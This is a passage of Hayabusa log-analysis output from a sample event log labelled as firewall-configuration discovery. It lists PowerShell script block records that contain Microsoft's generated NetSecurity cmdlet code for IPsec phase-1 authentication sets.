$script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw 
} } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmd",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"letization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if 
($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 
'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase1AuthSet'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; 
Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, 
$__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] 
[Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not 
